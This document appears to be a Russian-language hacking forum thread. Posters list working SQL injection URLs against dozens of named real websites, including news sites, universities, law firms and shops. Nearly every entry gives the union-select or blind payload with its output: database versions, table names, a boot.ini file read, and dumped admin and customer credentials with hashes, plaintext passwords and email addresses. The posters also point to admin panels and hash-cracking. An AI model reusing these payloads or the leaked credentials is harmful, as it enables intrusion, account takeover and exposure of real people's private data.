PR: 5

http://www.nordic-experts.gr/holarea.php?ID=-1+union+select+1,concat_ws(0x3a,database(),versio n(),u ser()),3--


nexpertsdb:4.0.18:nexperts@localhost

------------------------------------------------------------------------
PR: 6

http://www.notary.ge/index .php?lang=geo&query=regions&id=-1+union+select+concat_ws(0x3a,database (),version(),user())--


notary_main:5.0.67:notary_www@localhost

таблы :
regions_table,docs_table,statistics_table,english_ news_table,types_table,journal_table,users_table,n ews_table,backup_table

колумны таблы users_table:

id,user,password,name,type,reg_date


http://www.notary.ge/index.php?lang=geo&query=regions&id =-1+union+select+concat_ws(0x3a,id,user,pa ssword,name,type,reg_ date)+from+users_table--


1:5895700ee4f895f31ecb409f5e380fe7fb9e2524:f22c93f 486c3c3e7bb219761a452a5f13c23038f:GM Design Support Team:1:2006-01-31 01:13:00

--------------------------------------------------------------------------
http://www.avocat.gr/main-en.php?menu=practice&submenu=practice&id=-1+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user())--

ingcom_avocat:4.1.22-max-log:ingcom_avocat@208.109.181.151

------------------------------------------------------------------------
PR: 3

http://www.eurolux.com.gr/news.php?id=-1+union+select+1,2,@@version,4,5--

Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
------------------------------------------------------------------------
PR: 7

http://erasmus.aegean.gr/ects/grad_allcourses.php?id=1+union+select+1,concat_ws( 0x3a,version(),database (),use r()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22--


5.0.51:ects:ectsuser@localhost

PR: 3

http://dmet.iema.gr/index.php?lang=0&id=-1+union+select+1,concat_ws(0x3a,version(),datab ase(),user ()),3,4,5,6,7,8--


5.0.45-Debian_1-log:dmet:iema@localhost

Немного скулей от меня:

http://www.swissconfort.es/detail-produit.php?id=-1+union+all+select+0,1,2,3,4,CONCAT_WS(CHAR(32,58, 32),user(),database(),version()),6,7,8,9,10,11,12, 13,14,15--

db info:

swisscon3@localhost : swiss_confort_es : 4.1.19

################################################## #######

http://www.tuesdaymusic.at/gallery.php?id=-1+union+all+select+0,1,CONCAT_WS(CHAR(32,58,32),us er(),database(),version()),3,4,5--

db info:

web27@localhost : usr_web27_1 : 5.0.32-Debian_7etch6-log

################################################## ######

http://www.fondazionemondadori.it/electa/volume.php?item_id=-1+union+all+select+0,1,2,3,4,CONVERT(CONCAT_WS(CHA R(32,58,32),user(),database(),version())%20USING%2 0latin1),6,7,8,9,10,11,12,13--

db info:

fm_ele@10.10.0.11 : fondmond_electa : 4.1.10-log

################################################## ######

http://www.comitel.it/EN/newsdetail.php?id=-1+union+all+select+0,1,2,3,CONCAT_WS(CHAR(32,58,32 ),user(),database(),version()),5,6,7,8,9,10--

db info:

cominfjv@localhost : cominfjv_comitel : 4.1.22-standard

################################################## #######

http://www.vipers.mi.it/news.php?id=-1+union+all+select+0,CONCAT_WS(CHAR(32,58,32),user (),database(),version()),2,3,4--

db info:

103vipers@10.50.33.60 : vipersdb : 4.0.16-log

################################################## #####

http://www.klooun-maroulis.gr/default.php?id=-1'+union+select+1,2,@@version,4,5,6,7/*&lang=en

5.0.45


################################################## #
PR: 2

http://soundgeist.gr/index.php?page=article&id=-1+uni on+select+1,2,concat_ws(0x3a,version( ),database(),user()),4--

4.1.13:soundgeist:soundgeist@localhost

http://cards.ekalaiya.com/getnewsitem.php?newsid=1+union+select+1,2,concat(u sername,char(45),userpass),4,5+FROM+gc_cardusers--

arun-f24262fc9b726081efce5c1fbebcd71c ??*

http://cards.ekalaiya.com/login.php

PR: 3

http://www.hotelstanley.eunet.gr/index.php?user=page&id=-1+union+select+version()--


tables:
bookingaff,virtual_pictures,payment,additional_ser vice_pro,sent_documents,affiliatesclicks,textbanne r,multiplelanguage,r_stages_status,extra_amenities ,weeks,seo_values,invoiced_bids,clients,photo,conf igure,booking_location_temp,v43_valuegroups,number ofdays2,additional_service_booking,rooms,importedd ata,taxe,months,r_bid_actions,document_categories, bookingweeks_temp,bid_xlink,v43_groups,nb_of_prope rties_agent,realestate_additional_values,halfdaysn ame,specialweeks,lastminute_frontend2,a_inv_bids,p rospectiveresponses,deposit,bookingmonths,apropert ies,v43_booking_enquiry_results,n_groups,specialda ys,language,a_agentsettings,ratecard_rates2,files, properties_extra_amenities,days,bookingaff_temp,vt url,perioaddays,admin,affiliatespayment,tour_opera tors,mysqlservers,ratecard_month_intervals,extra_a menities_categories,years,shoppingcart,invoices,cl ients_orders,photo_multiple,configuremultiple,book ing_registry,v43_valuegroupsitems,numberofweeks,ad ditional_service_booking_temp,searchorder,inbox,af filiates,taxes,more_type

admins:
http://www.hotelstanley.eunet.gr/in dex.php?user=page&id=-1+union+select+group_concat(concat_ws(0x3a,user ,password))+from+admin--


admin:54f751b5099ae0b2f3fd695977ba7c95,bill:2dce15 9c010d7ac9b77c8c4c94612546,Ovancenna:d645a31508950 b4976e9ee86d1863d49,PartOfCar:ebcb419f185d7d602e4b 33c5e3aec3bc ??:(

http://www.pragaviaggi.it/?p=dettaglioPacchetto&idp=-585+union+select+1,2,3,concat_ws(0x3a,@@version_co mpile_os,version(),database(),user()),5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20

Os : pc-linux-gnu
Database Version: 4.1.22-standard
Database name: pragavia_pragaviaggi
User name: pragavia_pragau@localhost

PR: 3

http://www.ritzacapulco.com.mx/ver.php?lang=en&s=gr&id=1+union+select+1,concat_ws(0x3a,version(),data base(),use r()),3,4/*

4.1.22-standard-log:ritzaca_web:ritzaca_admin@web5.onnetsecure.net

PR 8
http://www.coe.ro/stire.php?id=772+AND+(SUBSTRING((version()),1,1))= 3/*

Version : 3.23.58
User : coe@localhost
Database : coe

PR: 4

http://www.travelway.gr/pa ges/en/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,ve rsion(),database(),user()),5,6,7--& cmd=read

4.0.16-standard-log:travelway:travelway@10.40.5.16

http://www.reintregirea.ro/index.php?cid=stire-1228+union+select+1,2,concat_ws(0x3a,@@version_com pile_os,version(),database(),user()),4,5,6,7+limit +1,1

Database Version: 5.0.32-Debian_7etch8-log
Database name: biserica
User name: usrbbsir@localhost
Os : pc-linux-gnu

http://www.tradeunionsdunit.org/profiles/profiles.php?ID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2/*TUAC@localhost:tuac:4.1.13-nt

http://www.danishww2pilots.dk/articles.php?id=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2,3,4,5,6,7,8danishww2pilots@srv54.one.co m:danishww2pilots:5.0.32-Debian_7etch10-log

http://www.remsoft.ca {PR 5}
http://www.remsoft.ca/news.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user())/*

4.1.22-community-nt-log : remsoft : remsoft@WSH-004

http://macinplay.de
http://macinplay.de/ViewReview.php?id=-342+union+select+1,2,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),4,5,6--
version():5.0.32-Debian_7etch1~bpo.1-log
database():macinplay_de
user():ftp49963@localhost
os:pc-linux-gnu: 2

tables:
http://macinplay.de/ViewReview.php?id=-342+union+select+1,2,table_name,4,5,6+from+informa tion_schema.tables--

http://www.parkinsonalliance.org {PR 6}
http://www.parkinsonalliance.org/news.php?ID=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11--

5.0.67 : parkinsonalliance_org_-_maindb : parky@localhost

----------------------------------------------------------------------------------------------------

http://www.theciel.com {PR 5}
http://www.theciel.com/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12--

5.0.51a-3ubuntu5.4 : ciel : ciel@localhost

http://www.artemismusic.com/page.php?id=-1+union+select+1--
4.1.22-standard-log
artemismusic@192.168.0.7

http://www.ftlauderdalenews.net {PR 3}
http://www.ftlauderdalenews.net/news.php?id=-140+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user()),5,6,7,8--

4.1.20-max-log : Promena_news : Promena_pubuser@76.162.254.225

tabla users:
http://www.ftlauderdalenews.net/news.php?id=-140+union+select+1,2,3,concat_ws(0x3a,name,passwor d),5,6,7,8+from+users--

Ray Brasted : 1x2y3z

--------------------------------------------------------------------------------------------------------------------------------

http://www.omnisens.ch {PR 5}
http://www.omnisens.ch/ditest/doc-news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12,13,14/*

4.1.22-log : db1034902 : user10349@web03

--------------------------------------------------------------------------------------------------------------------------------

http://www.nnpn.org {PR 5}
http://www.nnpn.org/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5/*

4.1.22-max-log : nnpn : nnpn@97.74.144.114

http://www.hlg.edu/common/profiles/profiles.php?id=-1+union+select+1,2,3,4,5,6,7,unhex(hex(concat_ws(0 x3a,user(),database(),version()))),9,10,11,12,13,1 4root@localhost:site_pages:5.0.15-nt
http://www.hlg.edu/common/profiles/profiles.php?id=-1+union+select+1,2,3,load_file(0x433A5C626F6F742E6 96E69),5,6,7,8,9,10,11,12,13,14
boot.ini

PR: 4

http://www.wostep.ch/index.php?id=-1'+union+select+1,2,concat_ws(0x3a,user(),databa se(),vers ion()),4,5+ --+&lang=en


web193@localhost:usr_web193_1:5.0.45

http://www.riff.it/php/show.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52Sql44172@62.149.130.186:Sql44172_1:4.0.30-standard-log

Пацаны с праздником,ну что поехали по немцам ;)

http://carnageclan.de/download_info.php?id=-1'+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6,7,8,9,10,11,12,13,14/*

v099182@localhost:v099182:4.1.21-max-log


есть форум :) tam


P.S за этот сайт спс mailbrush'y (3a no/\y4eHue info)
################################################## ##########

http://www.bitesser.de/freeware/script.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user() ,database(),version()),9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36--

web3_bitesser@localhost:web3_bitesser:5.0.26-log 1.1


tables:

http://www.bitesser.de/freeware/script.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat(table_na me),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36+from+informat ion_schema.tables+group+by+table_schema+limit+1,1--


bit_scri_imp,rel_gs_group_gs_rights,rel_bit_member _bit_scri_imp,bit_tip,rel_tipprechnung_tippposten, rel_bit_news_bit_news_cat,forum_member,bit_job,rel _bit_scri_bit_scri_his,generic_id_tablenames,bit_n ews_sta,rel_bit_tip_bit_tip_cat,gs_rights,gs_user, bit_scri_lan,rel_gs_user_gs_group,rel_bit_member_b it_tip,bit_tip_cat,tippkunde,rel_bit_news

http://www.bitesser.de/freeware/script.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat (column_name),9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36+from+information_schema.columns+where+table _name=0x67735f75736572--

generic_id,id,creation_date,creation_time,modify_d ate,modify_time,active,username,password,name,surn ame

(но что то она пустая)))

http://www.unipi.it/php/corsilaureaing/dett_corso.php?id=-218+union+select+null,null,version(),null,null,nul l,null,null,null,null,null,null,null,null,null
POSTGRESQL 7.1.3 ON SPARC-SUN-SOLARIS2.7, COMPILED BY GCC 2.8.1

Первый раз встречаюсь с PgSQL.

http://www.carolinainnatvg.com/news_detail.php?n_recid=-17+UNION+SELECT+1,2,3,4,5,6,7,8,9

Database Version: 5.0.45-log
Database name: biztools_carolinainn
User name: biztools_127@localhost

http://www.mytimber.net/news_detail.php?newsid=11+UNION+SELECT+1,2,3,4,5,6 ,7,8,9+LIMIT+1,1

Database Version: 4.0.24-log
Database name: uob0q1_db
User name: uob0q1@localhost

sql - blind
<<Центр дистанцонного обучения>>
http://www.tsiac.ru/cdo/index.php?id=14+or+ascii(substring(version(),1,1)) =52--+
db: 4.......

blind-sql:
www.aimp.ru

http://aimp.ru/index.php?do=view&id=5161+and+ascii(lower(substring(user(),2,1)))=10 5

user():aimp
http://aimp.ru/index.php?do=view&id=5161+and+substring(version(),1,1)=4
version():4....пля в 4й версии mysql неподдержуются подзапросы((((

http://www.derechoshumanos.org.mx/modules.php?name=News&file=article&sid=-301+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14

Вот только скобки фильтруются...

Target: metrocasas.com.mx

Evil link: http://metrocasas.com.mx/cliente/paginas/news.php?page=2&id_news=-60+union+select+1,2,3,4

Database info (user:version:database):
visiondig@localhost:4.1.21-standard-log:visiondig_metro

Users:
http://metrocasas.com.mx/cliente/paginas/news.php?page=2&id_news=-60+union+select+1,group_concat(login,0x3a,password ),3,4+from+users

http://www.islam.com.mx/quiz_output.php?quiz_id=2%27/**/union/**/select+1,password,username,4,5,6,7,8,9+from+user/*

login: smontiel
pass: 445339 (за пасс благодарю поисковую систему гугл)

http://cambiodeluces.arts-history.mx/entrada.php?id=-254+UNION+SELECT+concat_ws(0x3a,version(),user(),d atabase()),2,3,4,5,6,7,8--

Database Version: 5.0.45-log
Database name: neoartes
User name: neoartes@localhost

[QUOTE]Getting Data from table blog_users from database neoartes
Fields username:email:password

[0]:adminblogs:soporte@arts-history.mx:
[1]:mzavala:mzavala@arts-history.mx:85870bafb753ce276bfdb55c5e5630e3:Nr4HLK PIcVkaFMWpZMzeMd2LbknTKZ

Getting Data from table phpSP_users from database neoartes
Fields user:password

[0]:mzavala@arts-history.mx:
[1]:postafoto@prodigy.net.mx:ranita
[2]:correo@arts-history.mx:HNEJBQ
[3]:redaccion:noticias2008


Getting Data from table sre_sp_users from database neoartes
Fields user:password

[0]:admin:admin
[1]:usuario:usuario

http://www.kvbpr.com {PR 3}
http://www.kvbpr.com/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5--

5.0.67-community : kvbpr_kvbpr08 : kvbpr_idesign@localhost

table users:
http://www.kvbpr.com/news.php?id=-1+union+select+1,group_concat(name,0x3a,pass),3,4, 5+from+users--

http://www.technolex-anwaelte.de/index.php?id=43&news_id=1+UNION+SELECT+1,2,concat_ws(0x3a,user(),v ersion(),database()),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24--

php-info:
http://www.technolex-anwaelte.de/info.php

админка:
http://www.technolex-anwaelte.de/admin/

Просмотр дир:
http://www.technolex-anwaelte.de/admin/index_upload.php?dir=../

Пароли к админке:
1:technolex:technolex!
2:14v:14v

http://kiteonline.net/pages/news_detail.php?id=-34+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11

Database Version: 5.0.67-community
Database name: kiteonli_dbkite
User name: kiteonli_kitesit@localhost

In database kiteonli_dbkite found table adminusers
1 : firstname
2 : lastname
3 : email
4 : username
5 : password
6 : approval
7 : tbDate
8 : userid

http://www.stadiya.ru/news/?id=-434+union+select+1,2,3,4,concat_ws(0x3a,user(),dat abase(),version()),6,7,8,9--

stadiya_@imarket1.2x4.ru:stadiya_:4.1.22-log

тИЦ: 100
PR:4

http://www.sim.misto.zp.ua/show.php?id=-746+union+sele ct+concat(u ser(),0x0B,database(),0x0B,version())+--+
mistozpu_misto@localhost
mistozpu_smile
5.0.67-community-log

http://www.sim.misto.zp.ua/show.php?id=-746+union+select+concat(TABLE_NAME,0x0B,COLUMN _NAME)+from+information_schema.columns+lim it+179,10+--+


table: admin
columns: password
вот только немогу ниче с табл админ взять, не пойму че это, если у кого получется стянуть с админа свисните в личку, пасиб

_http://www.mango-mango.ru/news/index.php?page=single&rec=21
_http://www.mango-mango.ru/news/index.php?page=single&rec=21+order+by+7+--+
_http://www.mango-mango.ru/news/index.php?page=single&rec=-21+union+select+1,2,3,4,5,6,7+--+
_http://www.mango-mango.ru/news/index.php?page=single&rec=-21+union+select+1,version(),database(),4,user(),6, 7+--+

version - 4.1.22-sta
database - mangoman_base
user - mangoman_user@localhost

Таблицы:
customers
articles
news

http://www.flashadvisor.com/movie/index.php?viewCat=5+UNION+SELECT+1,2,3,concat_ws(0 x3a,version(),user(),database()),5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19--

Database Version: 5.0.67-community-log
Database name: flash_flashadvisor
User name: flash_flash@localhost


Getting Data from table vb_user from database flash_flashadvisor
Fields username:password:email

[0]:jitender:5e8514b0206009b14bd4792bd5eba75b:webmast er@flashadvisor.com
[1]:Anonymous:cad705a850274fce340b5228dad3565c:
[2]:imported_admin:54f8204238a02f62f1c54196f8a6febe:i nfo@flashadvisor.com
[3]:arun:29ee897dae199eeaa46075269845a3b5:info@netwea veronline.com
[4]:jhones:e50beb1d884c485a0ea84d906f107f43:lrai_sand y@yahoo.co.in
[5]:jeet:4b9b950ac479ec4f8e78c772af7144a3:forum@flash advisor.com


ps. 1-ая и 5-ая учётки админы)
__________________________________________________ _________________

[QUOTE]http://elgraficotam.com.mx/noticia.php?id=7518+union+selecT+version(),databas e(),3,user(),5,


версия_нах() : 4.1.22-standard
юзерь() : elgrafic_u
базэ() : elgrafic_bd

http://www.go2usa.ru/news.php?id=-143+union+select+1,2,3,4,5,6,concat_ws(0x3a,user() ,version(),database()),8,9--
sunnyart_usa@localhost:4.0.27-standard:sunnyart_usa
PR:2
тИЦ: 40


http://www.avia-line.ru/news/index.php?id=-23+union+select+concat_ws(0x3a,user(),version(),da tabase())+from+users--&lang=rus
avialin7_pilot@localhost:4.0.27-log:avialin7_avia
http://www.avia-line.ru/news/index.php?id=-23+union+select+concat_ws(0x3a,username,password)+ from+users--&lang=rus
admin1:2d40ebdd5c4dd48caba41846aa81c820fb51e67f
PR:2
тИЦ: 60

http://www.art-legion.com/page.php?id=-1%20union%20select%201,2,concat_ws(0x3a,id,login,p assword,name,email,priv),4,5,6,7,8,9,10%20from%20a legion_admins%20--

1:artmooncat:artsql:superadmin:sam@netservise.ru:0

http://www.yellowpages.md/news2/news.php?id=-260+union+select+1,2,3,4,5,6,concat_ws(0x3a,user() ,database(),version()),8,9,10,11,12--
yellowpages@localhost:yellowpages:4.1.22

http://www.utcm.md/index.php?action=content&id=-6%27+union+select+1,concat_ws(0x3a,version(),datab ase(),useR(),@@version_compile_os)/*



Database Version: 5.0.27
Database name: utcmmd
User name: utcmmd@localhost
Os : portbld-freebsd6.2

http://www.varo-inform.com/main.php?p=u.-1+UNION+SELECT+concat_ws(0x3a,user()%20,database() ,version(),@@version_compile_os),2/*.1.0



Database Version: 4.1.22
Database name: varo_test
User name: varo_test@localhost
Os : pc-linux-gnu

тИЦ: 30, PR: 4
http://www.brigsp.ru/news/news.php?id=-101+union+select+1,2,version(),4,5,6,7--

Еда ПР5
http://art.colorado.edu/hiaff/interview.php?id=47&cid=-3+union+select+1,2,3,4,5,6,7+from+mysql.user/*

http://www.movingpicturescollective.org/news/news.php?id=-476+union+select+1,2,3,concat_ws(0x3a,user(),datab ase(),version()),5--
nycfcug2_admin@localhost:nycfcug2_site:5.0.67-community PR5
tables:
http://www.movingpicturescollective.org/news/news.php?id=-476+union+select+1,2,3,TABLE_NAME,5+FROM+INFORMATI ON_SCHEMA.TABLES--
members:
http://www.movingpicturescollective.org/news/news.php?id=-476+union+select+1,2,3,concat_ws(0x3a,user_name,pa ssword),5+FROM+members--

http://www.chernayagora.com/view_page.php?page=-10+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9--

4.1.22-log:chernay3_goracom:chernay3_odmin@localhost

www.qpc.edu.pk

http://www.qpc.edu.pk/news.php?id=19+union+select+1,concat_ws(0x3a,versi on(),user(),database()),3,4,5,6,7,8

Версия - 5.0.67-community
Юзер - qpcedu_qpcadmin@localhost
БД - qpcedu_qpc

Табличка юзеры:

http://www.qpc.edu.pk/news.php?id=19+union+select+1,concat_ws(0x3a,user_ name,user_password),3,4,5,6,7,8+from+t_user

http://www.bungarayanews.com/news.php?id=-232+union+select+1,2,concat_ws(0x3a,user(),databas e(),version()),4,5,6,7,8,9,10--
bungaraya_admin@localhost:bungaraya_db:5.0.45-community-log
http://www.getawaytur.dp.ua/view_page.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5--
getawaytur_admin@localhost:getawaytur_db:5.0.22
http://www.notacop.com/user/view_page.php?id=-7622+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,u ser(),database(),version()),10--
root@localhost:scam_spider_test:5.0.41-community-nt

Ещё ЕДА
http://chick.cis.udel.edu/reactome_v3/update.php?ID=-373867+union+select+1,2,column_name,4,5+from+infor mation_schema.columns/*&PATH=71406&R=2

http://www.cascadeaids.org {PR 5}
http://www.cascadeaids.org/page.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user())/*

5.0.27-max-log : cap: cap@localhost

tables:
http://www.cascadeaids.org/page.php?id=-1+union+select+group_concat(table_name)+from+infor mation_schema.tables/*

http://www.1arenda.ru/flat.php?idflat=-152+union+select+1,2,concat_ws(0x3a,user(),databas e(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36--
dbu_ooospark_1@192.168.8.82:db_ooospark_1:4.1.22
PR:4
тИЦ: 200

http://www.videofil.net.ua/prices.php?id=-1+union+select+1,2,concat_ws(0x3a,id,login,passwor d),4,5,6,7,8+from+users+--+
1:admin:b4d5caaf5ef14f659142515d1d7fe0a9

http://www.catsmd.com/index.php?lang=ru&lnk=pomet.php?-4+union+select+1,2,3,concat_ws(0x3a,version(),data base(),useR(),@@version_compile_os),5,6,7,8,9,10,1 1,12,13,14,15,16--


Database Version: 5.1.32
Database name: catsmdc_cats
User name: catsmdc_root@localhost
Os : portbld-freebsd7.0

http://www.academianavigatio.org {PR 2}
http://www.academianavigatio.org/angielski/projects_more.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15--

5.0.75-log : anavigatio : anavigatio@85.128.177.64

columns where table name user:
http://www.academianavigatio.org/angielski/projects_more.php?id=-1+union+select+1,group_concat(column_name),3,4,5,6 ,7,8,9,10,11,12,13,14,15+from+information_schema.c olumns+where+table_name=0x75736572--

id,login,haslo,imie,nazwisko,data_utworzenia,prawo

columns info where table name user:
http://www.academianavigatio.org/angielski/projects_more.php?id=-1+union+select+1,concat_ws(0x3a,id,login,haslo,imi e,nazwisko,data_utworzenia,prawo),3,4,5,6,7,8,9,10 ,11,12,13,14,15+from+user--

1 : an : qwer1234 : ADMIN : ADMIN: 0000-00-00 : 1

http://shop.solarstone.co.uk/products.php?cat_id=-37+union+select+1,2,3,4,5,group_concat(concat_ws(0 x3a,email,passwd))+from+solarsto_shop.customers--
alexnews@clevercherry.com:clevercherry
shop@solarstone.co.uk:mow321m!
rich@solarstone.co.uk:mow321m!
lesdeguzman@hotmail.com:crittur17
sachin@natsep.co.za:oakenfold
andrea.giacomoni@tiscali.it:0be7xzja

http://baltija.eu/news_print.php?ntpl=2&print_id=-600+union+select+concat_ws(0x3a,version(),database (),user()),2,3,4,5,6,7,8--

4.1.22-standard:gjdrp_portal:gjdrp_portal@localhost

http://baltija.eu/news_print.php?ntpl=2&print_id=-600+union+select+group_concat(concat_ws(0x3a,login ,pass)),2,3,4,5,6,7,8+from+users--

sergey2:qweqwe
bratello555:pass
report:qweqwe
bratello55:pass
bratello55:wertery2


http://www.abdn.ac.uk/r&i/support/print.php?id=-75+union+select+1,version(),3,4,5,6,7,8,database() ,10,11,12,user(),14--

woi001_fund@webserv2-7.abdn.ac.uk
5.0.37-community-log
woi001_fund


http://www.articlesfree.co.uk/article.php?id=-24789+union+select+1,2,3,4,user(),database(),versi on(),8,9,10,11,12,13,14,15,16,17--&act=print

ukart01_adrian@localhost
5.0.67-community
ukart01_ukart

http://www.articlesfree.co.uk/article.php?id=-24789+union+select+1,2,3,4,group_concat(concat_ws( 0x3a,adminid,password)),6,7,8,9,10,11,12,13,14,15, 16,17+from+dbs_admin--&act=print

admin:6ecef1648de55c0ad4e1dbc87116ea6c

PR: 3

http://www.classic-zone.de/modding.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user ())--

4.1.22-max-log:v128336:v128336@localhost

########################################

http://www.admintalk.de/viewtips.php?id= 1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21--

5.0.32-Debian_7etch10-log:admintalk:Jann@localhost

куча таблов , выложу кусок:

http://www.admintalk.de/viewtips.php?id=1+union+select+1,group_concat(tabl e_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21+from+information_schema.tables+group+by+ta ble_schema+limit+2,1--

atalk_tips,atalk_programme_os,atalk_programme_imag es,pot_user_agents,pot_hostnames,pot_accesslog,ata lk_programme_subcategory,atalk_programme_language, pot_visitors,atalk_bezug_os,pot_operating_systems, pot_add_data,atalk_statistics_referrer,atalk_progr amme_licence,atalk_bezug_sprache,pot_referers,pot_ documents,atalk_system_users,atalk_progra

(смареть все таблы через лимит)

взял таблу atalk_system_users:

http://www.admintalk.de/viewtips.php?id=1+union+select+1,group_concat(conc at_ws(0x3a,name,username,email,password)),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+ata lk_system_users--

shadowsnake:admin:admin@admintalk.de:5840876be50d0 30815db1a392977205e,test6:test:admin@shadowsnake.d e:098f6bcd4621d373cade4e832627b4f6,Stefan:tty1:tty 1@gmx.net:fec0d60207dd5987e630ab4f6e47ba92,Burim:s uwan:master@xuwak.net:6b9260b1e02041a665d4e4a5117c fe16,Philipp:Philipp:phib89@web.de:0e219cdc17c98d1 f693492dfeabcbdcd


P.S какие то хеши есть в БД http://passcrackin g.ru/inde x.php так что вперед, тока у меня не получилось коннект в админку ))

www.khatece.com Харьковский театральный центр

http://www.khatece.com/html/press/news/new.php?id=-28+union+select+1,2,concat_ws(0x3a3a,version(),use r(),database()),4,5,6,7
5.0.67-community-log::new2002_new2002@localhost::new2002_theatre

Таблички:
http://www.khatece.com/html/press/news/new.php?id=-28+union+select+1,2,group_concat(table_name),4,5,6 ,7+from+information_schema.tables+group+by+table_s chema+limit+1,1
smi,comments,nick_base,photografs,theatres,News,da te_indexing,number,photos,places,bill_projects,fin d_wo,partners,projects,category,guestbook,photo_bi ll

http://www.britisharticledirectory.co.uk/article.php?id=-545+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,1 3,14,15,16,17--&act=print
4.1.22-standard:britisha_ad:britisha_ad@localhost

http://www.clubgb.co.uk/darts/teams/player-stats-print.php?ID=18&ID2=43&ID3=0&ID1=-33+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versi on(),database(),user()),9,10,11,12,13,14,15,16,17--
4.1.21-standard:clubgb:axol@195.224.50.61

ТИЦ: 10
PR: 4

http://www.levgroup.am/rus/index.php?sec=photo&id=-1+union+sel ect+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7--

5.0.67-community-log:levgroup_db:levgroup_db@localhost

tables: photo,home,photo_parent,images,about,users,news,ap load_images,other,create_photo

columns-users:

id,username,password,lastname,firstname,email

admin: 1:AL31d4H7:0562a1064bd7a70ffe5e5b6934e2c627 :(??

##########################################
PR: 4

http://www.parle.am/index.php? p=7&l=arm&s=3&id=-1+union+select+1, concat_ws(0x3a,version(),data base(),user()),3,4,5--

5.0.67-community:parleam_db:parleam_user@localhost

tables:catalogue,groups,category,pprice,content,pr inting,gallery,struct,ggroups

Универ Зимбабы))
http://www.uz.ac.zw/jobs/details.php?id=-385+union+select+1,2,3,4,5,6,table_name,8+from+inf ormation_schema.tables+limit+145,1000--

work_student
userinfo_def
userinfo_content
lp_user_module_progress
group_rel_team_user
bb_users
bb_rel_topic_userstonotify
user_sessions

http://www.emsa2008.org {PR 3}
http://www.emsa2008.org/index.php?id=-1+union+all+select+1,2,concat_ws(0x3a,version(),da tabase(),user()),4,5,6--

5.0.51a-24 : emsa2008 : emsa2008@localhost

http://www.emsa2008.org/index.php?id=-1+union+all+select+1,2,group_concat(login,0x3a,pas s),4,5,6+from+users--

login : emsa2008
pass : cemsa2008fpm

http://www.emsa2008.org/phpmyadmin

http://www.aioug.org/eventdetails.php?id=-5+union+select+1,group_concat(uname,char(58),pass, char(58),level,char(58),web

site),3,4,5,6,7,8,9,10,11,12+from+users--

newadmin:newadmin:admin:
info_desh:ssssss:user:
parthiban:kalaidream:user:
satyendra:pvnmurty:user:
rejurajeev:reju123:user:

http://www.braintumorfoundation.org/eventdetails.php?ID=-11+union+select+1,table_name,3,4,5+from+informatio n_schema.tables+limit+16,100+--+

btfforum1101,cont,events,faq,forumbu,forumbu2,foru mbu3,news,pstory,btfforum1101,cont,events,faq,foru mbu,

http://capla.arizona.edu/events/eventdetails.php?id=-66+union+select+1,2,3,group_concat(column_name),5, 6,7,8,9,10+from+information_schema.columns+where+t able_name=0x7573657273+/*+

http://www.sindadvogados-rj.com.br/SuperNews/valor.php?noticia=-1+union+select+0,1,2,user,pass,5+from+login--


admin

--------------------------------------------------------------------------------

00/00/0000 - 00h00min

--------------------------------------------------------------------------------


http://www.diamantinaonline.com.br/anterior/noticias/valor.php?noticia=-1+union+select+0,1,2,user,pass,5+from+login--


donline

--------------------------------------------------------------------------------

//5 - hmin

--------------------------------------------------------------------------------

ztotztot


supernews

http://www.monadgarden.com/andy/paper.php?id=-4+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12/*

